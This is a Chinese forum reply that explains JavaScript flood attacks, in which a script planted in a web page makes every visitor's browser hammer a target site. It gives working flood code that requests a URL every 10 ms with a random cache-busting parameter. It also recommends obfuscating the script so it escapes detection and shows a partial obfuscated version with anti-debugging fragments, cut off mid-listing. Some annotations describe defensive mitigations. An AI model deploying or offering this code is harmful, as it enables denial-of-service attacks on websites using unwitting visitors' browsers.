网友回复
什么是JavaScript洪水攻击?
JavaScript洪水攻击是指在网页中加入特殊的JS脚本,使每个访问该网页的用户的浏览器都高频请求某个目标网站地址;大量请求汇聚起来,就形成了一种DDoS攻击,也称为洪水式拒绝服务攻击。
javascript洪水攻击示例代码
<script type="text/javascript">
/**
 * Demonstration payload from the article: builds one URL from a fixed host,
 * a fixed path and a random `rand` query value, then assigns it to the `src`
 * of a freshly created Image so the browser requests it.
 *
 * Notes for defenders reading this sample:
 * - The host is 127.0.0.1 (loopback), so as written each visitor's browser
 *   requests its own machine.
 * - `rand` is an integer from 0 to 999; its only effect is that successive
 *   URLs differ. A cache that normalises or ignores unknown query parameters
 *   in its cache key treats all of these requests as the same resource.
 * - The Image is never attached to the document; the request is triggered
 *   by the `src` assignment alone, so nothing becomes visible on the page.
 *
 * @returns {undefined} Nothing; the function is called for its side effect.
 */
function imgflood() {
  const targetip = "127.0.0.1";
  const url = "/index.html";
  const pic = new Image();
  const rand = Math.floor(Math.random() * 1000);
  pic.src = `http://${targetip}${url}?rand=${rand}`;
}
// Schedules imgflood every 10 ms, i.e. nominally up to 100 calls per second
// for as long as the page stays open (browsers may throttle timers, e.g. in
// background tabs). On the receiving side this shows up as a steady
// per-visitor request rate with no user interaction, which per-client rate
// limiting can cap.
setInterval(imgflood,10);
</script>
这段代码的含义和攻击原理是:每10毫秒带一个随机参数请求一次127.0.0.1/index.html。随机参数使每次请求的URL各不相同,目的是避免命中缓存;防御方可据此识别这类流量(路径相同、仅查询参数不同的高频请求),并通过限速以及在缓存键中忽略未知查询参数来缓解。
为了防止脚本被识破,可对JS代码进行混淆加密(可使用在线JS代码混淆工具),比如将上述JS代码混淆后得到如下代码。需要注意,混淆只降低源码的可读性,并不改变脚本的网络行为;下面的字符串表中仍能直接看到 '127.0.0.1'、'http://'、'?rand=' 等明文片段。
<script type="text/javascript">
// String table of the obfuscated sample: returns an array of string
// fragments that the rest of the script looks up by numeric index.
//
// On the first call the function reassigns `_0x4f31` to a closure that
// returns the same array, so every later call yields the same array
// instance rather than a fresh copy.
//
// Notes for analysts:
// - The loop that follows this function in the listing rotates the array
//   with push/shift until a parseInt-based checksum matches, so the
//   index-to-string mapping at run time is not the literal order below.
// - Entries beginning with digits (e.g. '2430448LxHHeA') are presumably the
//   values that checksum reads via parseInt -- confirm against the loop.
// - The strings themselves are not encoded: the host, scheme, path and
//   query fragments of the original sample are readable as-is, so a plain
//   string search over the script still finds them.
// - Fragments such as 'debu' / 'gger', 'while\x20(tru' / 'e)\x20{}' and
//   '{}.constru' / 'ctor(\x22retu' / 'rn\x20this\x22)(' look like pieces of
//   anti-debugging and Function-constructor code; the code that would join
//   them is in the truncated part of the listing, so this is an inference.
//   If it holds, a Content-Security-Policy without 'unsafe-eval' on the
//   hosting page would block the Function-constructor calls.
function _0x4f31() {
var _0x1a3395 = [
'numAr',
'xukbA',
'ErUrl',
'split',
'mLmVa',
'vKzrU',
'9AZqmOr',
'2430448LxHHeA',
'/index.htm', // readable path fragment (the original sample uses "/index.html")
'wHSEf',
'WPEzI',
'GVYDW',
'$]*)',
'src', // property name used by the original sample (pic.src)
'xueHl',
'function\x20*',
'5656572wTSYWX',
'call',
'IElAA',
'random',
'1440YsYuBw',
'iJSOp',
'sADzy',
'glLav',
'MiKMb',
'esCIM',
'e)\x20{}',
'hCexA',
'cNjCd',
'apply',
'debu',
'constructo',
'ETTLc',
'IvNAf',
'\x5c+\x5c+\x20*(?:[',
'floor',
'length',
'jkVKG',
'?rand=', // readable query-string fragment from the original sample
'ofJMY',
'a-zA-Z_$][',
'pRcgv',
'http://', // readable scheme from the original sample
'4zwWEmL',
'init',
'fjzzz',
'yNrPh',
'stateObjec',
'hRMjD',
'0|3|1|2|4',
'rNmhh',
'yZnBU',
'BvoXB',
'oRaGX',
'chain',
'QCVDc',
'duwGI',
'nction()\x20',
'{}.constru',
'jxktV',
'890675POsWST',
'7214060vCnxtj',
'MUiwd',
'0-9a-zA-Z_',
'1592946XDpvVT',
'\x5c(\x20*\x5c)',
'gger',
'AATxX',
'while\x20(tru',
'3526555YpvATI',
'sLLbz',
'yTYyb',
'counter',
'HfiMG',
'return\x20(fu',
'test',
'setInterva',
'CbVBM',
'input',
'rn\x20this\x22)(',
'127.0.0.1', // readable host literal from the original sample (loopback)
'string',
'ctor(\x22retu',
'action',
'NhvZL'
];
// Replace this function with a closure over the array built above.
_0x4f31 = function () {
return _0x1a3395;
};
return _0x4f31();
}
(function (_0x347ffd, _0x4dbd53) {
var _0x4d049e = _0x2388, _0x175c4d = _0x347ffd();
while (!![]) {
try {
var _0x248d2 = parseInt(_0x4d049e(0x15d)) / (-0x643 + -0x1568 + 0x1bac) + parseInt(_0x4d049e(0x135)) / (-0x13f3 * 0x1 + 0x1c82 + -0x1 * 0x88d) * (-parseInt(_0x4d049e(0x127)) / (0x1312 * 0x1 + -0x16d + -0x11a2)) + parseInt(_0x4d049e(0x14c)) / (0x1 * -0x25 + 0x191e * 0x1 + -0x18f5) * (-parseInt(_0x4d049e(0x166)) / (-0x238a * -0x1 + 0x129a + 0x1 * -0x361f)) + -parseInt(_0x4d049e(0x161)) / (0x24b3 + -0x51c + 0x1f91 * -0x1) + parseInt(_0x4d049e(0x15e)) / (0x25dd + 0x1411 + -0x3 * 0x134d) + parseInt(_0x4d049e(0x128)) / (0x3d * -0x10 + 0x2218 * 0x1 + -0x1e40) + -parseInt(_0x4d049e(0x131)) / (0x14df + -0x259e + -0xc * -0x166);
if (_0x248d2 === _0x4dbd53)
break;
else
_0x175c4d['push'](_0x175c4d['shift']());
} catch (_0x11eff8) {
_0x175c4d['push'](_0x175c4d['shift']());
}
}
}(_0x4f31, -0x5155e + 0xcb5 * 0x16d + -0x384cc), (function () {
var _0x30bc99 = _0x2388, _0x4810a5 = {
'numAr': function (_0x56cc0d, _0x421aab) {
return _0x56cc0d(_0x421aab);
},
'GVYDW': function (_0x3c9968, _0x20045a) {
return _0x3c9968 + _0x20045a;
},
'QCVDc': _0x30bc99(0x16b) + _0x30bc99(0x15a),
……(原页面在此处截断,其余约70%的代码需点击查看,此处未显示)


